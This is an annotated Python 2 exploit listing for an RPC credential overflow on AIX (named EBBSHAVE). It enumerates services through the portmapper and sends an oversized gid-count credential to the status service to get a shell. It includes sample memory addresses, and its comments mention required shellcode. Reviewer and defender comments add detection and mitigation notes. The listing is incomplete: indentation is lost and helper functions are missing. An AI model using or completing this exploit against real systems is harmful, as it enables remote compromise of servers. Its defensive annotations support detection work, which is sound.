# Exploit code example; shellcode requires /usr/bin/bash on the target
# Example values for my AIX 7.2 LPAR:
# gid_base: 3007d390
# execl_func: d0307940
# execl_toc: f081bc20
# CAUTION: If an RPC service repeatedly crashes, it can be automatically disabled
from os import urandom
from socket import socket, AF_INET, SOCK_STREAM
from struct import pack, unpack
from sys import argv, exit
from time import time, sleep
# Opening lines of the helper that prepares the RPC credential body. Only these
# lines are present in this listing: the original indentation is lost and the
# code that assembles and returns the body is not shown.
# NOTE(review): the name suggests a loopback-flavour credential - confirm
# against the complete source.
def getCredLoopbackBody():
# Declares the module-level names the helper refers to; gid_base is listed
# twice, which Python accepts.
global gid_base, rhost, lhost, lport, gid_base, execl_func, execl_toc
# Current time packed as a big-endian unsigned 32-bit value.
epoch = pack('>I', time()) # Make sure the system clock is in sync w/ target
# Big enough to trigger an overflow
# Not big enough to trigger defensive code
# You could make this a little bit less,
# but you'd have to tweak the part 2 code
# Detection note: the value packed below is 64. AUTH_SYS-style credentials
# allow at most 16 supplementary gids (RFC 5531), so - assuming this field is
# that count - a sensor or filter can treat larger values as malformed.
gids_len = pack('>I', 64)
# Step 1 - service discovery: ask the target's portmapper which RPC programs
# are registered. getPacket, getMessage, rhost, services and attack are
# defined outside the lines shown here, and the original indentation is lost.
s = socket(AF_INET, SOCK_STREAM)
s.connect((rhost, 111)) # port 111 for portmapper
s.send(getPacket(getMessage(
100000, # portmapper
2, # version 2
4, # DUMP
False # unauth request
)))
s.recv(0x1c) # skip over fragment length, XID, message type, reply state, verifier, accept state
# NOTE(review): recv() may return fewer bytes than requested; the fixed-size
# unpack calls below assume each read is complete.
while list(unpack('>I', s.recv(4)))[0]: # while next "value follows" field is true
# Each DUMP entry is four big-endian 32-bit fields.
prog_num, ver_num, proto_num, port = unpack('>IIII', s.recv(16))
# Keep only the status program (100024) registered over TCP (protocol 6).
if (prog_num == 100024 # status
and proto_num == 6): # TCP
# print statement syntax: this listing is Python 2 only.
print '[ ] Found service ' + str(prog_num) + ' v' + str(ver_num) + ' on TCP port ' + str(port)
services.append((prog_num, ver_num, port))
s.close()
# Try attacking
# Step 2 - one NULL call per discovered service. `attack` is passed in the
# position where the DUMP request above passed False ("unauth request");
# presumably it selects whether the credential body is attached - confirm
# against getMessage.
# Defender view: a portmapper DUMP followed by a NULL call to program 100024,
# after which the service stops answering (or is disabled after repeated
# crashes), is the sequence to look for in RPC logs and packet captures.
# Limiting port 111 and the RPC service ports to trusted hosts removes
# exposure to both steps.
for service in services:
prog_num, ver_num, port = service
s = socket(AF_INET, SOCK_STREAM)
s.connect((rhost, port))
resp_len = 0
s.send(getPacket(getMessage(
prog_num,
ver_num,
0, # NULL, acts like a ping
attack
)))
s.settimeout(5) # give inetd/... a chance to spin up the service if needed
# The length of one read is the only signal used for the verdict below. The
# bare except also covers timeouts, connection errors and Ctrl+C, so the
# "Probably vulnerable" message is a heuristic, not a confirmation.
try:
resp_len = len( s.recv(1024) ) # try to receive up to 1024 bytes
except:
resp_len = 0 # typically either timeout, connection error, or Ctrl+C
try:
s.close() # try closing the connection if it isn't already dead
except:
pass # connection is probably already dead
print '[ ] Got response length ' + str(resp_len)
if resp_len == 0: # suspect the service either timed out or crashed
if attack:
print '[+] Probably vulnerable to EBBSHAVE, hopefully you have a shell'
else:
print '[-] Service probably down or otherwise misbehaving, skipping...'
# NOTE(review): with indentation lost it is unclear whether this break belongs
# to the else branch only or to the whole resp_len == 0 case - confirm.
break